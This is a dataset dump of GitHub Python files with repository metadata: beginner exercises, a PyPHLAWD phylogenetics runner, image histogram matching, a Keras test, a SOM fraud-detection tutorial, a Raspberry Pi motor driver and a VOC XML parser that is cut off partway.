| blob_id (string, 40) | directory_id (string, 40) | path (string, 2-616) | content_id (string, 40) | detected_licenses (list, 0-69) | license_type (string, 2 classes) | repo_name (string, 5-118) | snapshot_id (string, 40) | revision_id (string, 40) | branch_name (string, 4-63) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 2.91k-686M, nullable) | star_events_count (int64, 0-209k) | fork_events_count (int64, 0-110k) | gha_license_id (string, 23 classes) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (string, 213 classes) | src_encoding (string, 30 classes) | language (string, 1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 2-10.3M) | extension (string, 246 classes) | content (string, 2-10.3M) | authors (list, 1) | author_id (string, 0-212) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
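Each row below is one record with the columns listed above. As a rough illustration only, the sketch below shows how a table with this schema could be streamed and filtered; it assumes the data is published as a Hugging Face `datasets` dataset, and the dataset path `your-org/your-dataset` is a placeholder rather than a name taken from this document.

```python
# Minimal sketch, assuming a Hugging Face-style dataset with the columns above.
# The dataset path is a placeholder; only the column names come from the header.
from datasets import load_dataset

ds = load_dataset("your-org/your-dataset", split="train", streaming=True)

# Keep permissively licensed, non-vendored, non-generated Python files.
for row in ds:
    if (row["language"] == "Python"
            and row["license_type"] == "permissive"
            and not row["is_vendor"]
            and not row["is_generated"]):
        print(row["repo_name"], row["path"], row["length_bytes"])
        break  # stop after the first match; drop this to scan the full split
```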
75011d583f8ed3d79e464fde4a0f8d561402530b
|
ea709c54bc670dfe29645d4953016b35bcd1ba51
|
/python101/small/work_or_sleep_in.py
|
98647724be5bc3bdd8a3286decf32538e4f362cf
|
[] |
no_license
|
aammokt/newProject
|
28a4d562738cf678442359d5e163ca192a2d652f
|
288c6a3ebce9debc5b681a847aabd039b2571832
|
refs/heads/master
| 2020-08-04T10:33:23.421375
| 2019-11-10T07:04:56
| 2019-11-10T07:04:56
| 212,107,895
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 108
|
py
|
day = int(input('Day (0-6)? '))
if day == 0 or day == 6:
print("Sleep in")
else:
print("Go to work")
|
[
"alim.anuar@gmail.com"
] |
alim.anuar@gmail.com
|
03407dc891590de2c8d38cae0e52aacc673380f7
|
120e6df90ad210b1608296302620e61a1e3d6e7d
|
/src/run_pyphlawd_sequential.py
|
78ed92d77def0beebd91d13c2f351b0e1672b7f6
|
[] |
no_license
|
uribe-convers/Fungi_ToL
|
83858993b6a77a2a9e6186f4f15ff918eeb53d43
|
e664ec46aeebca24ed1a01190673af02fe4bd144
|
refs/heads/master
| 2021-01-20T11:36:13.624816
| 2018-01-16T16:40:02
| 2018-01-16T16:40:02
| 99,732,285
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,572
|
py
|
#! /usr/bin/env python
""" use this to run pyphlawd, put this in a folder that you want to run the analyses"""
import os,sys
# change the database path accordingly
database= "/data_nvme/PHLAWD_DBS/pln.db"
# change your focal clade in Clade_list
Clade_list = ["Entomophthoromycotina", "Mortierellomycotina", "Ustilaginomycotina", "Taphrinomycotina", "Kickxellomycotina", "Zoopagomycotina", "Mucoromycotina", "Glomeromycotina", "Pezizomycotina", "Saccharomycotina", "Pucciniomycotina", "Agaricomycotina"]
WORKDIR = os.getcwd()+"/"
for i in Clade_list:
    cmd_setup = "python ~/apps/PyPHLAWD/src/setup_clade.py "+i+" "+database+" . " # must use . for current directory
    print cmd_setup
    os.system(cmd_setup)
    for f in os.listdir(WORKDIR):
        if f.startswith(i) and not f.endswith(".tre"):
            clusterID = f.split("_")[1]
            outconf = open(WORKDIR+clusterID+".ctl", "a")
            outconf.write("y\nn\ny\ny\n"+database+"\n"+clusterID+"\n")
            outconf.close()
            cmd_file = clusterID+"_cmd.txt"
            cmd_goodclu = "python ~/apps/PyPHLAWD/src/find_good_clusters_for_concat.py "+f+" < "+WORKDIR+clusterID+".ctl"+" > "+cmd_file
            print cmd_goodclu
            os.system(cmd_goodclu)
            with open(cmd_file,"rU") as handle:
                for l in handle:
                    if l.startswith("python"):
                        cmd_filterseq = l.strip()
                        Concat_aln = WORKDIR+f+"/"+f+"_outaln"
                        concatin = open(WORKDIR+clusterID+"_concatIn.txt","w")
                        concatin.write(Concat_aln+"\n")
                        concatin.close()
                        cmd_filterseq += " < "+WORKDIR+clusterID+"_concatIn.txt"
                        print cmd_filterseq
                        os.system(cmd_filterseq)
|
[
"uribe.convers@gmail.com"
] |
uribe.convers@gmail.com
|
bf265d50b8e20e755fa294e2c7d246f1c1e2aa11
|
19b1bd54c1959ea7074e2ef691da8abfe2fd81eb
|
/Assignment_1/src/question7.2.i.py
|
46121e185ab79e009b615b24057f94d08e704d65
|
[] |
no_license
|
jeetv/Digital_Image_Processing
|
aba5f3962e8a705581bfcb01b2a5b8c08ddcf87e
|
cef0b9449106b8098eaf0c326159a10c1437c0c3
|
refs/heads/master
| 2022-11-18T20:51:54.824326
| 2020-07-15T06:40:04
| 2020-07-15T06:40:04
| 279,781,049
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,195
|
py
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
def cumulative_histogram(hist):
    cum_hist = np.copy(hist)
    for i in range(1, 256):
        cum_hist[i] = cum_hist[i-1] + cum_hist[i]
    return cum_hist
def histogram(img):
    height = img.shape[0]
    width = img.shape[1]
    hist = np.zeros((256))
    for i in range(height):
        for j in range(width):
            a = img[i,j]
            hist[a] += 1
    return hist
def Histogram_plot(title,img):
    hist,bins = np.histogram(img.flatten(),256,[0,256])
    cdf = hist.cumsum()
    cdf_normalized = cdf * hist.max()/ cdf.max()
    # plotting histogram
    plt.plot(cdf_normalized, color = 'b')
    plt.hist(img.flatten(),256,[0,256], color = 'r')
    plt.title(title)
    plt.xlim([0,256])
    plt.legend(('cdf','histogram'), loc = 'upper left')
    plt.show()
img = cv2.imread('D:/DIP/Assignment_1/a1_2019701006/input_data/eye.png', cv2.IMREAD_GRAYSCALE)
img_ref = cv2.imread('D:/DIP/Assignment_1/a1_2019701006/input_data/eye.png', cv2.IMREAD_GRAYSCALE)
def Histogram_Matching(img,img_ref):
    Histogram_plot('Image',img)
    Histogram_plot('Ref Image',img_ref)
    row = img.shape[0]
    col = img.shape[1]
    pixels = row * col
    pixels_ref = img_ref.shape[0] * img_ref.shape[1]
    hist = histogram(img)
    hist_ref = histogram(img_ref)
    cum_hist = cumulative_histogram(hist)
    cum_hist_ref = cumulative_histogram(hist_ref)
    prob_cum_hist = cum_hist / pixels
    prob_cum_hist_ref = cum_hist_ref / pixels_ref
    K = 256
    new_values = np.zeros((K))
    for a in range(K):
        j = K - 1
        while True:
            new_values[a] = j
            j = j - 1
            if j < 0 or prob_cum_hist[a] > prob_cum_hist_ref[j]:
                break
    for i in range(row):
        for j in range(col):
            a = img[i,j]
            b = new_values[a]
            img[i,j]=b
    return img
Hist_match=Histogram_Matching(img,img_ref)
Histogram_plot('Histogram Matched',Hist_match)
cv2.imshow('Histogram matched',Hist_match)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"noreply@github.com"
] |
jeetv.noreply@github.com
|
442f06e185a19672e261b62b17153e72bbbe3877
|
ae0e6d02edd97a6d6e88b6483d92abca3bf55f63
|
/tests/test_sort_layer.py
|
967b3b07ade56662a98295ac9e51e4c9d17a1f24
|
[] |
no_license
|
thongonary/CMS_Deep_Learning
|
7a3ccb4ea341434ae083e6f5e0bf43e7df11d963
|
80e914f935d9cd6ca2f1237bc61fad5519b52906
|
refs/heads/master
| 2021-04-06T20:16:08.054349
| 2018-03-15T21:15:02
| 2018-03-15T21:15:02
| 125,426,799
| 2
| 0
| null | 2018-03-15T21:13:40
| 2018-03-15T21:13:34
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,435
|
py
|
import sys, os
if __package__ is None:
    import sys, os
    sys.path.append(os.path.realpath("../"))
import unittest
from keras.layers import Input
from keras.engine import Model
from CMS_Deep_Learning.layers.sort_layer import Sort,Perturbed_Sort,Finite_Differences
import numpy as np
def test_works():
    a = Input(shape=(None, 4), name="input")
    ls = Sort(initial_beta=np.array([1, 0, 0, 0]), name='sort')
    s = ls(a)
    p_ls = Perturbed_Sort(ls)
    p_s = p_ls(a)
    model = Model(input=[a], output=[s, p_s], name='test')
    # print(Sort(nb_out=5).get_output_shape_for((1,2,3)))
    inp = np.random.random((1000, 300, 4))
    indicies = np.argsort(inp[:, :, 0])
    # print(indicies)
    target = np.array([np.take(inp[i], indicies[i], axis=-2) for i in range(inp.shape[0])])
    # print("Input")
    # print(inp)
    # print("Target")
    # print(target)
    model.compile(optimizer=Finite_Differences(model, ls, p_ls), loss={'sort': 'mse',
                                                                       'pert_sort': 'mse'})
    # model.fit(inp, [target, target], nb_epoch=200,batch_size=1000)
    print(model.evaluate(inp,[target,target],batch_size=1000))
# print(target)
# class TestLorentz(unittest.TestCase):
if __name__ == '__main__':
    import objgraph
    objgraph.show_most_common_types()
    test_works()
    objgraph.show_most_common_types()
    # unittest.main()
|
[
"dannyweitekamp@gmail.com"
] |
dannyweitekamp@gmail.com
|
d0dbd2a5247684b1ca82b498129fb8f825def345
|
b9f791c320dd7c84ee388447fb7f46c583a8386f
|
/Week__6.py
|
1ec9332844a599e3562d0e998e329ae5014c44d6
|
[] |
no_license
|
smarigowda/SukruthiLearningPython
|
d39dec0beaed6d0aead32a5bac4fd086a9ef0de5
|
4190f7043cd1a3131963daa559d2d63154937f45
|
refs/heads/master
| 2020-06-13T23:55:39.599006
| 2017-02-12T18:16:21
| 2017-02-12T18:16:21
| 75,542,332
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
# big number game
import random
highest = 1000
answer = random.randint(1, highest)
print("Please guess a number between 1 and {}: ".format(highest))
guess = 0
while guess != answer:
    guess = int(input())
    if guess == 0:
        break
    if guess < answer:
        print("Please guess higher.")
    elif guess > answer:
        print("Please guess lower.")
    else:
        print("Well done, you guessed it")
|
[
"santosharakere@gmail.com"
] |
santosharakere@gmail.com
|
26805815aba615d6c989373312c4bc72265aa1f1
|
0329677920e29e68778c623b05bf4ca69e528c41
|
/Part 8 - Deep Learning/Section 42- SELF ORGANIZING MAPS_/Mega_Case_Study/Mega_Case_Study/som.py
|
3fd00008b8d5a3d504da1a882b30b3284fdcc0b8
|
[] |
no_license
|
celestialized/Machine-Learning
|
b2075b83139f66bc31c02c64cfe27dfbf19e4ab6
|
df30af31f04d03d9796974daf82373436fb6460e
|
refs/heads/master
| 2021-09-21T16:55:51.432572
| 2018-08-29T20:33:13
| 2018-08-29T20:33:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,040
|
py
|
# Self Organizing Map
#IT CONVERT MANY COLUMN INTO 2-d MAP
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
#http://archive.ics.uci.edu/ml/datasets/statlog+(australian+credit+approval)
#in this problem to detect the approval of credit card application
#here outlier are the faulty neurons which should not be approved
#here we will calculate mean interneuron distance(MID) i.e mean of euclian distance between study neuron and neighbourhood so we can detect outlier which will be far from the nieghbour neuron on basis of euclian distance
dataset = pd.read_csv('Credit_Card_Applications.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values
#here will only use X in training set because doing unsuperwise deep learning// we are telling customer eligibility, not predicting classes. so no dependent variable considered.
# Feature Scaling(between 0 & 1)
#compulsary for deep learning so high computation
from sklearn.preprocessing import MinMaxScaler
sc = MinMaxScaler(feature_range = (0, 1))
X = sc.fit_transform(X)
# -------Training the SOM
#here we are using MiniSom 1.0
#https://test.pypi.org/project/MiniSom/1.0/
#here in your working directory , we need to keep Minisom 1.0.py file downloaded created by developer in working directory.
from minisom import MiniSom
som = MiniSom(x = 10, y = 10, input_len = 15, sigma = 1.0, learning_rate = 0.5)#object som trained on X// X & y are dimension of SOM(MORE THE DATA i.e no of CUSTOMER more will be dimension)/// here input_len is the no of feature in training dataset i.e X(14) and +1 for customer id
som.random_weights_init(X)#sigma is the radious of different neighbourhood i.e default value is 1.0// learning_rate will decide how much weight updated in each learning rate so default value is 0.5 so higher will be the learning_rate faster will be convergence, lower the learning_rate, longer the self organising map take time to build.// decay_function can be use to improve convergence
som.train_random(data = X, num_iteration = 100)#num_iteration is no of time it need to repeate
#random_weights_init IS THE method initialize the weight mention by developer i.e by Minisom1.0
#train_random method use to train
# ---------Visualizing the results
#here we will calculate mean interneuron distance(MID) i.e mean of euclian distance between study neuron and neighbourhood so we can detect outlier which will be far from the nieghbour neuron on basis of euclian distance
#larger the mid closer to white in colour
from pylab import bone, pcolor, colorbar, plot, show#BUILDING self organising map
bone()#initlizee the figure i.e window contain map
pcolor(som.distance_map().T)#use different colour for different MID/// distance_map WILL RETURN ALL mid IN MAPS.// ".T" will take transpose of MID matrics
colorbar()# that is legend for all colour
markers = ['o', 's']# 'o', 's' circle and squire as markers
colors = ['r', 'g']# red circle if customer did not get approval and green squire if customer got approval
for i, x in enumerate(X): # enumerate(X) all vector of customer in all iteration
    w = som.winner(x)# winner get winning nodes of all customer
    plot(w[0] + 0.5, #adding markers and color in each winner nodes
         w[1] + 0.5, #0.5 to put at centre of marker
         markers[y[i]], #if y[i] is 0 then marker[0] correspond to circle with red color
         markeredgecolor = colors[y[i]],
         markerfacecolor = 'None', #markerfacecolor tell that inside color of marker is non
         markersize = 10,
         markeredgewidth = 2)
show()
# Finding the frauds
mappings = som.win_map(X)#win_map use to get dictionary
frauds = np.concatenate((mappings[(8,1)], mappings[(3,8)]), axis = 0)# take outlier cordinate of "Visualizing the results" section// concatenate function use to concatenate these two customer in one list
frauds = sc.inverse_transform(frauds)# axis = 0 means concatenate aling vertical axis i.e customer put below to other
#inverse_transform use to reverse scaling
# ==========Part 2 - Going from Unsupervised to Supervised Deep Learning
# Creating the matrix of features
customers = dataset.iloc[:, 1:].values#all column from index 1 to last one
# Creating the dependent variable
#is_fraud is dependent variable
is_fraud = np.zeros(len(dataset))#vector initialize eith zero 690
for i in range(len(dataset)):# loop it if cusatomer id match with froud then replace 0 with 1 in is_fraud dependent variable
    if dataset.iloc[i,0] in frauds:# ith customer of first column match with fraud id
        is_fraud[i] = 1#replace
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
customers = sc.fit_transform(customers)
# ------Part 2 - Now let's make the ANN!
# Importing the Keras libraries and packages
from keras.models import Sequential
from keras.layers import Dense
# Initialising the ANN
classifier = Sequential()
# Adding the input layer and the first hidden layer
classifier.add(Dense(units = 2, kernel_initializer = 'uniform', activation = 'relu', input_dim = 15))
# Adding the output layer
classifier.add(Dense(units = 1, kernel_initializer = 'uniform', activation = 'sigmoid'))
# Compiling the ANN
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# Fitting the ANN to the Training set
classifier.fit(customers, is_fraud, batch_size = 1, epochs = 2)# batch_size = 1, epochs = 2 use because have less data
# Predicting the probabilities of frauds
y_pred = classifier.predict(customers)
y_pred = np.concatenate((dataset.iloc[:, 0:1].values, y_pred), axis = 1)#concatenate dataset.iloc[:, 0:1].values is customer id, and y_pred row wise(axis = 1)
y_pred = y_pred[y_pred[:, 1].argsort()]# sorting probability
#second column(y_pred[:, 1) is going to sort
#argsort() sort the arrar of column index 1
#here we use 0:1 to make customer id 2-D array in concatenate because y_pred id 2-D matrix and customer id dataset.iloc[:, 0] have 1-D array so
|
[
"ranasinghiitkgp@gmail.com"
] |
ranasinghiitkgp@gmail.com
|
ecf8a9a8bf5893ca0a15c7017b893c7461e1bf29
|
1555996141776d77ca76a79ab768fb0f39689b84
|
/Create Your First Robot with ROS/my_robot_control/motor_driver.py
|
89bee657205764cf339002eb08717d3f924cac8d
|
[] |
no_license
|
im7RJ/ROSBOTS
|
d3ba146b4e63ec3fc24e935f372b28d80a57b6bd
|
5fd4d29d8d66f92ac4feea621a0afa4be67fe32b
|
refs/heads/main
| 2023-05-07T16:50:17.622818
| 2021-06-03T13:34:21
| 2021-06-03T13:34:21
| 373,515,598
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,694
|
py
|
#!/usr/bin/env python
import rospy
import RPi.GPIO as GPIO
import time
class MotorDriver(object):
def __init__(self, wheel_distance=0.098, wheel_diameter=0.066, i_BASE_PWM=50, i_MULTIPLIER_STANDARD=0.1, i_MULTIPLIER_PIVOT=1.0, simple_mode = True):
"""
M1 = Right Wheel
M2 = Left Wheel
:param wheel_distance: Distance Between wheels in meters
:param wheel_diameter: Diameter of the wheels in meters
"""
self.PIN = 18
self.PWMA1 = 6
self.PWMA2 = 13
self.PWMB1 = 20
self.PWMB2 = 21
self.D1 = 12
self.D2 = 26
self.PWM1 = 0
self.PWM2 = 0
self.BASE_PWM = i_BASE_PWM
self.MAX_PWM = 100
self.simple_mode = simple_mode
# Wheel and chasis dimensions
self._wheel_distance = wheel_distance
self._wheel_radius = wheel_diameter / 2.0
self.MULTIPLIER_STANDARD = i_MULTIPLIER_STANDARD
self.MULTIPLIER_PIVOT = i_MULTIPLIER_PIVOT
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(self.PIN, GPIO.IN, GPIO.PUD_UP)
GPIO.setup(self.PWMA1, GPIO.OUT)
GPIO.setup(self.PWMA2, GPIO.OUT)
GPIO.setup(self.PWMB1, GPIO.OUT)
GPIO.setup(self.PWMB2, GPIO.OUT)
GPIO.setup(self.D1, GPIO.OUT)
GPIO.setup(self.D2, GPIO.OUT)
self.p1 = GPIO.PWM(self.D1, 500)
self.p2 = GPIO.PWM(self.D2, 500)
self.p1.start(self.PWM1)
self.p2.start(self.PWM2)
def __del__(self):
GPIO.cleanup()
def set_motor(self, A1, A2, B1, B2):
GPIO.output(self.PWMA1, A1)
GPIO.output(self.PWMA2, A2)
GPIO.output(self.PWMB1, B1)
GPIO.output(self.PWMB2, B2)
def forward(self):
self.set_motor(0, 1, 0, 1)
def stop(self):
self.set_motor(0, 0, 0, 0)
def reverse(self):
self.set_motor(1, 0, 1, 0)
def left(self):
self.set_motor(0, 1, 0, 0)
def left_reverse(self):
self.set_motor(1, 0, 0, 0)
def pivot_left(self):
self.set_motor(1, 0, 0, 1)
def right(self):
self.set_motor(0, 0, 0, 1)
def right_reverse(self):
self.set_motor(0, 0, 1, 0)
def pivot_right(self):
self.set_motor(0, 1, 1, 0)
def set_M1M2_speed(self, rpm_speedM1, rpm_speedM2, multiplier):
self.set_M1_speed(rpm_speedM1, multiplier)
self.set_M2_speed(rpm_speedM2, multiplier)
def set_M1_speed(self, rpm_speed, multiplier):
self.PWM1 = min(int((rpm_speed * multiplier) * self.BASE_PWM), self.MAX_PWM)
self.p1.ChangeDutyCycle(self.PWM1)
print("M1="+str(self.PWM1))
def set_M2_speed(self, rpm_speed, multiplier):
self.PWM2 = min(int(rpm_speed * multiplier * self.BASE_PWM), self.MAX_PWM)
self.p2.ChangeDutyCycle(self.PWM2)
print("M2="+str(self.PWM2))
def calculate_body_turn_radius(self, linear_speed, angular_speed):
if angular_speed != 0.0:
body_turn_radius = linear_speed / angular_speed
else:
# Not turning, infinite turn radius
body_turn_radius = None
return body_turn_radius
def calculate_wheel_turn_radius(self, body_turn_radius, angular_speed, wheel):
if body_turn_radius is not None:
"""
if angular_speed > 0.0:
angular_speed_sign = 1
elif angular_speed < 0.0:
angular_speed_sign = -1
else:
angular_speed_sign = 0.0
"""
if wheel == "right":
wheel_sign = 1
elif wheel == "left":
wheel_sign = -1
else:
assert False, "Wheel Name not supported, left or right only."
wheel_turn_radius = body_turn_radius + ( wheel_sign * (self._wheel_distance / 2.0))
else:
wheel_turn_radius = None
return wheel_turn_radius
def calculate_wheel_rpm(self, linear_speed, angular_speed, wheel_turn_radius):
"""
Omega_wheel = Linear_Speed_Wheel / Wheel_Radius
Linear_Speed_Wheel = Omega_Turn_Body * Radius_Turn_Wheel
--> If there is NO Omega_Turn_Body, Linear_Speed_Wheel = Linear_Speed_Body
:param angular_speed:
:param wheel_turn_radius:
:return:
"""
if wheel_turn_radius is not None:
# The robot is turning
wheel_rpm = (angular_speed * wheel_turn_radius) / self._wheel_radius
else:
# Its not turning therefore the wheel speed is the same as the body
wheel_rpm = linear_speed / self._wheel_radius
return wheel_rpm
def set_wheel_movement(self, right_wheel_rpm, left_wheel_rpm):
#print("W1,W2=["+str(right_wheel_rpm)+","+str(left_wheel_rpm)+"]")
if right_wheel_rpm > 0.0 and left_wheel_rpm > 0.0:
#print("All forwards")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_STANDARD)
if self.simple_mode:
# We make it turn only on one wheel
if right_wheel_rpm > left_wheel_rpm:
#print("GO FORWARDS RIGHT")
self.right()
if right_wheel_rpm < left_wheel_rpm:
#print("GO FORWARDS LEFT")
self.left()
if right_wheel_rpm == left_wheel_rpm:
#print("GO FORWARDS")
self.forward()
else:
#print("GO FORWARDS")
self.forward()
elif right_wheel_rpm > 0.0 and left_wheel_rpm == 0.0:
#print("Right Wheel forwards, left stop")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_STANDARD)
self.left()
elif right_wheel_rpm > 0.0 and left_wheel_rpm < 0.0:
#print("Right Wheel forwards, left backwards --> Pivot left")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_PIVOT)
self.pivot_left()
elif right_wheel_rpm == 0.0 and left_wheel_rpm > 0.0:
#print("Right stop, left forwards")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_STANDARD)
self.right()
elif right_wheel_rpm < 0.0 and left_wheel_rpm > 0.0:
#print("Right backwards, left forwards --> Pivot right")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_PIVOT)
self.pivot_right()
elif right_wheel_rpm < 0.0 and left_wheel_rpm < 0.0:
#print("All backwards")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_STANDARD)
if self.simple_mode:
# We make it turn only on one wheel
if abs(right_wheel_rpm) > abs(left_wheel_rpm):
#print("GO BACKWARDS RIGHT")
self.right_reverse()
if abs(right_wheel_rpm) < abs(left_wheel_rpm):
#print("GO BACKWARDS LEFT")
self.left_reverse()
if right_wheel_rpm == left_wheel_rpm:
#print("GO BACKWARDS")
self.reverse()
else:
self.reverse()
elif right_wheel_rpm == 0.0 and left_wheel_rpm == 0.0:
#print("Right stop, left stop")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_STANDARD)
self.stop()
else:
assert False, "A case wasn't considered==>"+str(right_wheel_rpm)+","+str(left_wheel_rpm)
pass
def set_cmd_vel(self, linear_speed, angular_speed):
body_turn_radius = self.calculate_body_turn_radius(linear_speed, angular_speed)
wheel = "right"
right_wheel_turn_radius = self.calculate_wheel_turn_radius(body_turn_radius,
angular_speed,
wheel)
wheel = "left"
left_wheel_turn_radius = self.calculate_wheel_turn_radius(body_turn_radius,
angular_speed,
wheel)
right_wheel_rpm = self.calculate_wheel_rpm(linear_speed, angular_speed, right_wheel_turn_radius)
left_wheel_rpm = self.calculate_wheel_rpm(linear_speed, angular_speed, left_wheel_turn_radius)
self.set_wheel_movement(right_wheel_rpm, left_wheel_rpm)
|
[
"noreply@github.com"
] |
im7RJ.noreply@github.com
|
eaafd97a3b66ddc8243249cd58a921af8ae38985
|
7a6dcd5197e6dfedc5bdc38586adc0e3fd9d2676
|
/Unit3/ps3_hangman.py
|
fa6a5a610d1c80353f94fe2a646b9712cb34f58e
|
[] |
no_license
|
HrachAsatryan/PythonCourse
|
f8145757e20ef36671891656de8cb5fc0f0b371e
|
38fe4151e3805d482f3c1042a97742e4ed691dd3
|
refs/heads/main
| 2023-06-21T10:14:20.858366
| 2021-07-22T10:58:14
| 2021-07-22T10:58:14
| 379,166,722
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,552
|
py
|
# Hangman game
#
# -----------------------------------
# Helper code
# You don't need to understand this helper code,
# but you will have to know how to use the functions
# (so be sure to read the docstrings!)
import random
WORDLIST_FILENAME = "words.txt"
def loadWords():
"""
Returns a list of valid words. Words are strings of lowercase letters.
Depending on the size of the word list, this function may
take a while to finish.
"""
print("Loading word list from file...")
# inFile: file
inFile = open(WORDLIST_FILENAME, 'r')
# line: string
line = inFile.readline()
# wordlist: list of strings
wordlist = line.split()
print(" ", len(wordlist), "words loaded.")
return wordlist
def chooseWord(wordlist):
"""
wordlist (list): list of words (strings)
Returns a word from wordlist at random
"""
return random.choice(wordlist)
# end of helper code
# -----------------------------------
# Load the list of words into the variable wordlist
# so that it can be accessed from anywhere in the program
wordlist = loadWords()
def isWordGuessed(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: boolean, True if all the letters of secretWord are in lettersGuessed;
False otherwise
'''
for l in secretWord:
if l not in lettersGuessed:
return False
return True
def getGuessedWord(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: string, comprised of letters and underscores that represents
what letters in secretWord have been guessed so far.
'''
guess = ''
for l in secretWord:
if l in lettersGuessed:
guess += l
else:
guess += '_'
return guess
def getAvailableLetters(lettersGuessed):
'''
lettersGuessed: list, what letters have been guessed so far
returns: string, comprised of letters that represents what letters have not
yet been guessed.
'''
allletters = 'abcdefghijklmnopqrstuvwxyz'
availlets = ''
for l in allletters:
if l not in lettersGuessed:
availlets += l
return availlets
def hangman(secretWord):
'''
secretWord: string, the secret word to guess.
Starts up an interactive game of Hangman.
* At the start of the game, let the user know how many
letters the secretWord contains.
* Ask the user to supply one guess (i.e. letter) per round.
* The user should receive feedback immediately after each guess
about whether their guess appears in the computers word.
* After each round, you should also display to the user the
partially guessed word so far, as well as letters that the
user has not yet guessed.
Follows the other limitations detailed in the problem write-up.
'''
print("Welcome to the game Hangman!")
length = len(secretWord)
guessesLeft = 8
lettersGuessed = ''
print(f"I am thinking of a word that is {length} letters long.")
print("-------------")
done = False
while guessesLeft > 0 or done is True:
print(f"You have {guessesLeft} guesses left.")
print(f"Available letters: {getAvailableLetters(lettersGuessed)}")
guess = input("Please guess a letter: ")
guess = guess.lower()
if guess in lettersGuessed:
print(f"Oops! You've already guessed that letter: {getGuessedWord(secretWord, lettersGuessed)}")
elif guess in secretWord:
lettersGuessed += guess
print(f"Good guess: {getGuessedWord(secretWord, lettersGuessed)}")
else:
lettersGuessed += guess
guessesLeft -= 1
print(f"Oops! That letter is not in my word: {getGuessedWord(secretWord, lettersGuessed)}")
print("-------------")
if not "_" in getGuessedWord(secretWord, lettersGuessed):
print("Congratulations, you won!")
done = True
break
elif guessesLeft == 0:
print(f"Sorry, you ran out of guesses. The word was {secretWord}.")
break
# When you've completed your hangman function, uncomment these two lines
# and run this file to test! (hint: you might want to pick your own
# secretWord while you're testing)
secretWord = chooseWord(wordlist).lower()
hangman(secretWord)
|
[
"intelinair@IntelinAirs-MacBook-Pro.local"
] |
intelinair@IntelinAirs-MacBook-Pro.local
|
aea16e0264322faacb3cff68da0ac4f50a472a55
|
6f1034b17b49f373a41ecf3a5a8923fb4948992b
|
/pychron/hardware/kerr/tests/kerr_motor.py
|
fa203e2f504d4b02343785c91885bc3ab936dcce
|
[
"Apache-2.0"
] |
permissive
|
NMGRL/pychron
|
a6ec1854488e74eb5d3ff53eee8537ecf98a6e2f
|
8cfc8085393ace2aee6b98d36bfd6fba0bcb41c6
|
refs/heads/main
| 2023-08-30T07:00:34.121528
| 2023-06-12T17:43:25
| 2023-06-12T17:43:25
| 14,438,041
| 38
| 28
|
Apache-2.0
| 2023-08-09T22:47:17
| 2013-11-15T23:46:10
|
Python
|
UTF-8
|
Python
| false
| false
| 229
|
py
|
import unittest
class KerrMotorTestCase(unittest.TestCase):
    def test_something(self):
        self.assertEqual(True, False)
    def test_float_to_hexstr(self):
        pass
if __name__ == "__main__":
    unittest.main()
|
[
"jirhiker@gmail.com"
] |
jirhiker@gmail.com
|
026ea2cb643b8aa5f372081eab11ecea7f645230
|
518e9704fa8af10be824deec4b55e40bb21060e0
|
/VOC/anchor/prior_anchors.py
|
ccd711fa7f0a1714debc534b6abac0d650d2f920
|
[] |
no_license
|
yl-jiang/Yolov2-Pytorch1.2
|
5d072d9b6e03cb759591fbc251cba7f946ed3d4e
|
4d41f695c099bc0567cbeff60bce8be94e2a8c38
|
refs/heads/master
| 2022-04-22T04:16:54.477783
| 2020-04-24T14:34:09
| 2020-04-24T14:34:09
| 258,536,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,125
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/8/22 3:53 PM
# @Author : jyl
# @File : prior_anchors.py
from config import opt
import numpy as np
import matplotlib.pyplot as plt
import random
from utils import alias_sample
from tqdm import tqdm
import os
from bs4 import BeautifulSoup
import pickle
VOC_BBOX_LABEL_NAMES = ('aeroplane', 'bicycle', 'bird', 'boat', 'bottle',
'bus', 'car', 'cat', 'chair', 'cow',
'diningtable', 'dog', 'horse', 'motorbike', 'person',
'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor')
def parse_voc2012_xml(xml_file):
bboxes = []
labels = []
obj_names = []
bs = BeautifulSoup(open(xml_file), features='lxml')
img_file_name = bs.find('filename').string
size_obj = bs.find('size')
width = int(float(size_obj.find('width').string))
height = int(float(size_obj.find('height').string))
